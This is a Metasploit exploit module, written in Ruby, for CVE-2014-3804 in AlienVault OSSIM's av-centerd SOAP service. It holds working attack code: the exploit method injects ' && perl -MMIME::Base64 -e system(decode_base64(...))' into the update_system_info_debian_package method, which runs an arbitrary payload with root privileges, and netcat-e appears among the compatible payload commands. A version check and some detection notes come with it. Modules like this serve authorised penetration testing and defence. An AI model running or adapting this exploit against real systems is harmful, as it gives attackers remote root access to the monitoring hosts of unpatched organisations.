Path: blob/master/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb
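##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rexml/document'

# AlienVault OSSIM av-centerd command injection (CVE-2014-3804).
#
# av-centerd is a SOAP::Lite service (this module defaults to port 40007 over
# SSL). Its update_system_info_debian_package method hands its fifth string
# argument to perl backticks without sanitisation, so a " && <command>" suffix
# on that argument is executed. AlienVault 4.6.1 and prior are affected;
# #check treats 4.7.0 and later as fixed.
#
# Detection notes: the exploiting request is a POST to /av-centerd whose
# SOAPAction header names update_system_info_debian_package and whose body
# embeds a "perl -MMIME::Base64 -e" invocation. The check request targets the
# read-only get_dpkg method and is otherwise shaped the same way.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include REXML

  # SOAP method whose fifth argument is the injection point.
  VULNERABLE_METHOD = 'update_system_info_debian_package'.freeze

  # First release that #check reports as Safe.
  FIXED_VERSION = Gem::Version.new('4.7.0')

  # Captures the alienvault-center package version from a get_dpkg listing
  # (constructed example: "alienvault-center 4.6.0-12" yields "4.6.0").
  VERSION_RE = /alienvault-center\s*([\d\.]*)-\d/

  # Namespace declarations placed on the soap:Envelope element.
  ENVELOPE_ATTRS = {
    'xmlns:xsi' => 'http://www.w3.org/2001/XMLSchema-instance',
    'xmlns:soapenc' => 'http://schemas.xmlsoap.org/soap/encoding/',
    'xmlns:xsd' => 'http://www.w3.org/2001/XMLSchema',
    'soap:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/',
    'xmlns:soap' => 'http://schemas.xmlsoap.org/soap/envelope/'
  }.freeze

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'AlienVault OSSIM av-centerd Command Injection',
      'Description' => %q{
        This module exploits a code execution flaw in AlienVault 4.6.1 and
        prior. The vulnerability exists in the av-centerd SOAP web service,
        where the update_system_info_debian_package method uses perl backticks
        in an insecure way, allowing command injection. This module has been
        tested successfully on AlienVault 4.6.0.
      },
      'Author' =>
        [
          'Unknown', # From HP ZDI team, Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2014-3804'],
          ['BID', '67999'],
          ['ZDI', '14-202'],
          ['URL', 'http://forums.alienvault.com/discussion/2690']
        ],
      'Privileged' => true,
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Payload' =>
        {
          # 'BadChars' => "[;`$<>|]", # not applied: the payload is base64-wrapped by the perl stub
          'Compat' => {
            'RequiredCmd' => 'perl netcat-e openssl python gawk'
          }
        },
      'DefaultOptions' =>
        {
          'SSL' => true
        },
      'Targets' =>
        [
          [ 'AlienVault <= 4.6.1', { }]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2014-05-05'))

    register_options(
      [
        Opt::RPORT(40007)
      ])
  end

  # Fingerprints av-centerd through the read-only get_dpkg SOAP call and
  # compares the reported alienvault-center version with FIXED_VERSION.
  #
  # @return [Msf::Exploit::CheckCode] Appears when a well-formed version below
  #   4.7.0 is read; Safe otherwise (no response, wrong server, no version).
  def check
    version = extract_version(send_soap_request('get_dpkg'))
    return Exploit::CheckCode::Safe if version.nil?

    # Gem::Version compares per numeric component, so 4.10.0 sorts after
    # 4.7.0; a plain String comparison would order it before.
    if Gem::Version.new(version) >= FIXED_VERSION
      Exploit::CheckCode::Safe
    else
      Exploit::CheckCode::Appears
    end
  end

  # Sends the injecting update_system_info_debian_package request. The 1 second
  # timeout is much shorter than the default used by #check; the response is
  # not inspected, so the module does not wait for the call to complete.
  def exploit
    send_soap_request(VULNERABLE_METHOD, 1)
  end

  # Builds the SOAP envelope for `method` with four random string arguments
  # (c-gensym3..9). For VULNERABLE_METHOD a fifth argument (c-gensym11) is
  # added whose value is a random prefix followed by " && perl ..." carrying
  # the base64-encoded payload.
  #
  # @param method [String] SOAP method name placed in the AV/CC/Util namespace
  # @return [String] serialised XML document
  def build_soap_request(method)
    xml = Document.new
    envelope = xml.add_element('soap:Envelope', ENVELOPE_ATTRS)
    body = envelope.add_element('soap:Body')
    call = body.add_element(method, { 'xmlns' => 'AV/CC/Util' })

    # Positional string arguments; the names mirror what SOAP::Lite clients
    # generate (c-gensymN), each filled with 4-7 random letters.
    (3..9).step(2).each do |n|
      add_string_arg(call, "c-gensym#{n}").text = rand_text_alpha(4 + rand(4))
    end

    if method == VULNERABLE_METHOD
      perl_stub = "system(decode_base64(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
      injected = add_string_arg(call, 'c-gensym11')
      injected.text = "#{rand_text_alpha(4 + rand(4))} && perl -MMIME::Base64 -e '#{perl_stub}'"
    end

    xml.to_s
  end

  # POSTs the SOAP document for `method` to /av-centerd and returns the raw
  # HTTP response (nil on connection failure/timeout, as send_request_cgi does).
  #
  # @param method [String] SOAP method name; also placed in the SOAPAction header
  # @param timeout [Integer] seconds to wait for a response
  # @return [Rex::Proto::Http::Response, nil]
  def send_soap_request(method, timeout = 20)
    send_request_cgi({
      'uri' => '/av-centerd',
      'method' => 'POST',
      'ctype' => 'text/xml; charset=UTF-8',
      'data' => build_soap_request(method),
      'headers' => {
        'SOAPAction' => "\"AV/CC/Util##{method}\""
      }
    }, timeout)
  end

  private

  # Adds an xsd:string argument element named `name` under `call`.
  #
  # @return [REXML::Element] the new element, so callers can set its text
  def add_string_arg(call, name)
    call.add_element(name, { 'xsi:type' => 'xsd:string' })
  end

  # Extracts the alienvault-center version from a get_dpkg response.
  #
  # @param res [Rex::Proto::Http::Response, nil]
  # @return [String, nil] nil when there is no 200 response from a SOAP::Lite
  #   server, no alienvault-center line, or the captured text is not a
  #   well-formed version (e.g. "4." would otherwise raise in Gem::Version).
  def extract_version(res)
    return nil unless res && res.code == 200
    return nil unless /SOAP::Lite/.match?(res.headers['SOAPServer'].to_s)

    match = VERSION_RE.match(res.body.to_s)
    return nil unless match

    version = match[1]
    return nil if version.empty? || !Gem::Version.correct?(version)

    version
  end
end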